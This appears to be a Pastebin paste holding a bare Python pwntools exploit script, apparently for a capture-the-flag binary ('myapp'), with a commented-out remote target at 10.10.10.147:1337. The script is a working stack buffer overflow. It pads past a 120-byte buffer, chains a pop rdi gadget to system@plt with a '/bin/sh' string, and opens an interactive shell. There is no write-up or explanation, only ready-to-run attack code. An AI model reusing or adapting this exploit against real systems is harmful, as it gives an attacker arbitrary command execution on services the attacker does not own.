Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import pwn
- plt_system = pwn.p64(0x401040)
- plt_puts = pwn.p64(0x401030)
- pop_rdi = pwn.p64(0x40120b)
- main = pwn.p64(0x40115f)
- buf_heap_addr = pwn.p64(0x405670)
- buf = "/bin/sh\x00"
- buf += "A" * (120 - len(buf))
- buf += pop_rdi
- buf += buf_heap_addr
- buf += plt_system
- buf += main
- # p = pwn.remote("10.10.10.147", 1337)
- p = pwn.process("./myapp")
- p.recvline()
- p.sendline(buf)
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement